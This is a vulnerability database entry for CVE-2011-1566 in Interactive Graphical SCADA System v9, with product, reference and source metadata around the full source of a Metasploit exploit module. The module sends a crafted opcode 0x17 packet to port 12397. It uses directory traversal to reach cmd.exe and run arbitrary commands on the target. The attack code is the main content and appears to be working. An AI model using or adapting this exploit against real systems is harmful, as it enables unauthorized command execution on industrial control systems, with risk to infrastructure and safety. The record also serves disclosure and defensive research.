Details of VAR-E-201103-0087

ID

VAR-E-201103-0087

CVE

cve_id:	CVE-2011-1566	Trust: 2.4
cve_id:	CVE-2011-1567	Trust: 0.8
cve_id:	CVE-2011-1568	Trust: 0.3
cve_id:	CVE-2011-1565	Trust: 0.3

sources: BID: 46936 // PACKETSTORM: 123709 // PACKETSTORM: 101465 // EXPLOIT-DB: 29129 // EDBNET: 50928

EDB ID

29129

TITLE

Interactive Graphical SCADA System - Remote Command Injection (Metasploit) - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 29129

DESCRIPTION

Interactive Graphical SCADA System - Remote Command Injection (Metasploit). CVE-2011-1566CVE-72349 . remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 29129

AFFECTED PRODUCTS

vendor:	interactive	model:	graphical scada system	scope:	-	version:	-	Trust: 1.0
vendor:	interactive	model:	graphical scada system remote	scope:	-	version:	-	Trust: 0.5
vendor:	7	model:	igss b11063 igssdataserver.exe	scope:	lte	version:	<=v9.00.00	Trust: 0.5
vendor:	7	model:	interactive graphical scada system	scope:	eq	version:	9	Trust: 0.3
vendor:	7	model:	interactive graphical scada system	scope:	eq	version:	8	Trust: 0.3

sources: BID: 46936 // PACKETSTORM: 123709 // PACKETSTORM: 101465 // EXPLOIT-DB: 29129

EXPLOIT

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Interactive Graphical SCADA System Remote Command Injection',
'Description' => %q{
This module abuses a directory traversal flaw in Interactive
Graphical SCADA System v9.00. In conjunction with the traversal
flaw, if opcode 0x17 is sent to the dc.exe process, an attacker
may be able to execute arbitrary system commands.
},
'Author' =>
[
'Luigi Auriemma',
'MC'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-1566'],
[ 'OSVDB', '72349'],
[ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],
],
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 153,
'DisableNops' => true
},
'Targets' =>
[
[ 'Windows', {} ]
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Mar 21 2011'))

register_options(
[
Opt::RPORT(12397)
], self.class)
end

def exploit

print_status("Sending exploit packet...")

connect

packet = [0x00000100].pack('V') + [0x00000000].pack('V')
packet << [0x00000100].pack('V') + [0x00000017].pack('V')
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
packet << [0x00000000].pack('V') + [0x00000000].pack('V')
packet << [0x00000000].pack('V')
packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
packet << "windows\\system32\\cmd.exe\" /c #{payload.encoded}"
packet << "\x00" * (143) #

sock.put(packet)
sock.get_once(-1,0.5)
disconnect

end

Trust: 1.0

sources: EXPLOIT-DB: 29129

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 29129

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 29129

TYPE

Remote Command Injection (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 29129

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 29129

EXTERNAL IDS

db:	NVD	id:	CVE-2011-1566	Trust: 2.4
db:	EXPLOIT-DB	id:	29129	Trust: 1.6
db:	NVD	id:	CVE-2011-1567	Trust: 0.8
db:	EDBNET	id:	50928	Trust: 0.6
db:	PACKETSTORM	id:	123709	Trust: 0.5
db:	PACKETSTORM	id:	101465	Trust: 0.5
db:	NVD	id:	CVE-2011-1568	Trust: 0.3
db:	NVD	id:	CVE-2011-1565	Trust: 0.3
db:	BID	id:	46936	Trust: 0.3

sources: BID: 46936 // PACKETSTORM: 123709 // PACKETSTORM: 101465 // EXPLOIT-DB: 29129 // EDBNET: 50928

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2011-1566	Trust: 2.1
url:	https://www.exploit-db.com/exploits/29129/	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2011-1567	Trust: 0.5
url:	http://aluigi.org/adv/igss_4-adv.txt	Trust: 0.3
url:	http://aluigi.org/adv/igss_8-adv.txt	Trust: 0.3
url:	http://aluigi.org/adv/igss_5-adv.txt	Trust: 0.3
url:	http://aluigi.org/adv/igss_2-adv.txt	Trust: 0.3
url:	http://aluigi.org/adv/igss_7-adv.txt	Trust: 0.3
url:	http://aluigi.org/adv/igss_1-adv.txt	Trust: 0.3
url:	http://aluigi.org/adv/igss_3-adv.txt	Trust: 0.3
url:	http://www.igss.com/	Trust: 0.3
url:	http://aluigi.org/adv/igss_6-adv.txt	Trust: 0.3

sources: BID: 46936 // PACKETSTORM: 123709 // PACKETSTORM: 101465 // EXPLOIT-DB: 29129 // EDBNET: 50928

SOURCES

db:	BID	id:	46936
db:	PACKETSTORM	id:	123709
db:	PACKETSTORM	id:	101465
db:	EXPLOIT-DB	id:	29129
db:	EDBNET	id:	50928

LAST UPDATE DATE

2022-07-27T09:19:19.814000+00:00

SOURCES UPDATE DATE

db:

BID

id:

46936

date:

2015-04-13T21:05:00

SOURCES RELEASE DATE

db:	BID	id:	46936	date:	2011-03-21T00:00:00
db:	PACKETSTORM	id:	123709	date:	2013-10-22T01:43:26
db:	PACKETSTORM	id:	101465	date:	2011-05-16T21:53:30
db:	EXPLOIT-DB	id:	29129	date:	2013-10-22T00:00:00
db:	EDBNET	id:	50928	date:	2013-10-22T00:00:00

tag:	exploit	Trust: 1.0
tag:	Metasploit Framework (MSF)	Trust: 1.0
tag:	arbitrary	Trust: 0.5
tag:	remote	Trust: 0.5
tag:	overflow	Trust: 0.5
tag:	code execution	Trust: 0.5

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE